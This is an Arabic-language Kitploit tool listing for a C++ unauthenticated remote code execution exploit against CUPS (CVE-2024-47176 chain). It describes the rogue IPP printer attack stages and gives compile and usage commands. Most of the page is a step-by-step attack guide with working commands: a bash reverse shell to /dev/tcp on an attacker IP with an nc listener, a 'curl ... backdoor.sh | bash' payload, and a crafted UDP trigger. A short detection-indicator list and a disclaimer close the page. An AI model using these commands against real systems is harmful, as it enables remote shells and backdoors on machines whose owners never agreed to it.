Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/stickxx00/cups-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubstickxx00/cups-rce-exploit

Cups-RCE-Exploit

استغلال بلغة C++ لتنفيذ أوامر عن بعد بدون مصادقة على CUPS عبر سلسلة CVE-2024-47176.

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال تنفيذ الأوامر عن بعد في CUPS - سلسلة CVE-2024-47176

ما هو

استغلال إثبات مفهوم كامل الوظائف يستهدف سلسلة ثغرات تنفيذ الأوامر عن بعد في نظام الطباعة الموحد (CUPS) التي تم اكتشافها في سبتمبر 2024. تتكون هذه السلسلة من أربع ثغرات CVE — CVE-2024-47176 و CVE-2024-47076 و CVE-2024-47175 و CVE-2024-47177 — والتي تسمح معًا لمهاجم بعيد غير مصادق بتنفيذ أوامر عشوائية على أي نظام لينكس يعمل بإصدار ضعيف من CUPS.

كيف يعمل

يقوم الاستغلال بنشر خادم IPP (بروتوكول الطباعة عبر الإنترنت) مارق يحاكي طابعة شبكة. يتكشف الهجوم على أربع مراحل:

المرحلة 1 — محفز الاكتشاف
يتم إرسال حزمة UDP مصممة إلى المنفذ 631 للهدف. يثق برنامج cups-browsed الخفي في هذه الحزمة دون مصادقة ويبدأ اتصال TCP عائدًا إلى خادم IPP للمهاجم لجلب سمات الطابعة.

المرحلة 2 — تسليم PPD خبيث
يستجيب خادم IPP للمهاجم بسمات طابعة تحتوي على بيانات غير نظيفة. تمر هذه البيانات عبر libcupsfilters و libppd اللذين يفشلان في التحقق من صحة الإدخال أو تنظيفه، مما يسمح بتضمين توجيه FoomaticRIPCommandLine خبيث في ملف PPD.

المرحلة 3 — حقن الأوامر
عند إرسال مهمة طباعة إلى الطابعة التي يتحكم فيها المهاجم (إما تلقائيًا أو بفعل مستخدم)، يقوم مرشح foomatic-rip بمعالجة ملف PPD وتنفيذ الأمر المحقون بصلاحيات مستخدم lp.

المرحلة 4 — تنفيذ الحمولة
يتم تشغيل الأمر المحقون على النظام المستهدف. تشمل الحمولات الشائعة الصدف العكسية، تثبيت الباب الخلفي، سرقة البيانات، أو التحضير لتصعيد الصلاحيات.

الإصدارات المتأثرة

cups-browsed <= 2.0.1
libcupsfilters <= 2.1b1
libppd <= 2.1b1
cups-filters <= 2.0.1

قامت معظم توزيعات لينكس بشحن الإصدارات المتأثرة حتى تصحيحات أواخر 2024.

المتطلبات الأساسية

  • جهاز لينكس يحتوي على g++ وأدوات التطوير القياسية
  • الوصول الشبكي إلى الهدف (يجب أن يكون المنفذ UDP 631 قابلاً للوصول)
  • يجب أن يكون الهدف يشغل cups-browsed ويستمع على UDP 631
  • يوصى بحقوق الجذر أو sudo لربط المنفذ 631 (أو استخدم منفذًا عاليًا مثل 1631)

التجميع

root@kitploit:~
g++ -std=c++11 -O2 -pthread -o cups_rce_exploit cups_rce_exploit.cpp

لا تبعيات خارجية. يمكن تجميعه على أي توزيعة لينكس تحتوي على g++.

الاستخدام

root@kitploit:~
./cups_rce_exploit -l <ATTACKER_IP> -r <COMMAND> [options]

الخيارات

  • -l, --listener عنوان IP للمهاجم لخادم IPP المارق
  • -r, --reverse الأمر المراد تنفيذه على الهدف، أو مسار ملف نصي
  • -t, --target عنوان IP للجهاز المستهدف (يرسل حزمة UDP محفزة تلقائيًا)
  • -p, --port المنفذ لخادم IPP المارق (الافتراضي: 631)
  • -s, --spoof اسم الطابعة المزيفة (الافتراضي: VulnPrinter)
  • -T, --target-port منفذ UDP للهدف (الافتراضي: 631)
  • -h, --help عرض رسالة المساعدة

مثال الصدفة العكسية

الطرفية 1 — ابدأ المستمع:

root@kitploit:~
nc -lvnp 4444

الطرفية 2 — شغل الاستغلال:

root@kitploit:~
./cups_rce_exploit -l 192.168.1.50 -r "bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" -t 192.168.1.100

الحمولة من ملف

root@kitploit:~
echo 'curl http://192.168.1.50/backdoor.sh | bash' > payload.sh
./cups_rce_exploit -l 192.168.1.50 -r ./payload.sh -t 192.168.1.100

وضع الخادم مع محفز يدوي

الطرفية 1 — ابدأ الخادم:

root@kitploit:~
./cups_rce_exploit -l 192.168.1.50 -r "whoami > /tmp/pwned.txt"

الطرفية 2 — أرسل محفز UDP إلى الهدف:

root@kitploit:~
echo '0 3 ipp://192.168.1.50:631/printers/VulnPrinter "Office" "Printer"' | nc -u 192.168.1.100 631

استخدام منفذ غير مميز

root@kitploit:~
./cups_rce_exploit -l 192.168.1.50 -p 1631 -r "id > /tmp/owned" -t 192.168.1.100 -T 631

دليل الهجوم الكامل

الخطوة 1: إعداد مستمع netcat على جهاز المهاجم

root@kitploit:~
nc -lvnp 4444

الخطوة 2: تجميع الاستغلال

root@kitploit:~
g++ -std=c++11 -O2 -pthread -o cups_rce_exploit cups_rce_exploit.cpp

الخطوة 3: تشغيل الاستغلال ضد الهدف

root@kitploit:~
./cups_rce_exploit -l 192.168.1.50 -r "bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" -t 192.168.1.100

الخطوة 4: إذا قام مستخدم على الجهاز المستهدف بطباعة صفحة اختبار أو أي مستند إلى الطابعة المارقة، فستتلقى صدفة عكسية كمستخدم lp.

مؤشرات الكشف

  • حزم UDP غير متوقعة على المنفذ 631 تحتوي على سلاسل URI لـ IPP
  • اتصالات TCP صادرة من cups-browsed إلى مضيفين غير معروفين على المنفذ 631
  • ظهور طابعات غير معروفة تلقائيًا في واجهة CUPS الويب
  • عمليات تم إنشاؤها بواسطة foomatic-rip أو تحت مستخدم lp

إخلاء المسؤولية

إشعار قانوني

تم توفير هذا البرنامج للأغراض التعليمية والبحثية فقط. يهدف إلى مساعدة المتخصصين في الأمن، ومختبر الاختراق، ومسؤولي الأنظمة على فهم واكتشاف والدفاع ضد الثغرات الموصوفة.

الاستخدام غير المصرح به لهذا الاستغلال ضد أنظمة لا تمتلكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني وقد ينتهك قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، وقانون إساءة استخدام الحاسوب، وقوانين مماثلة في ولايات قضائية أخرى.

تشمل حالات الاستخدام المصرح بها تقييمات الأمن على الأنظمة التي تمتلكها، واختبارات الاختراق بتفويض كتابي، وبرامج مكافآت الثغرات بنطاق محدد، والبحث الأكاديمي في بيئات مختبرية خاضعة للرقابة، ومسابقات CTF.

لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. المستخدمون مسؤولون وحدهم عن الامتثال لجميع القوانين السارية والحصول على التفويض المناسب قبل الاختبار.

باستخدام هذا البرنامج، فإنك تقبل هذه الشروط.

المراجع

  • https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
  • https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
  • https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6
  • https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
  • https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I
  • https://www.cups.org
تنزيل الأداة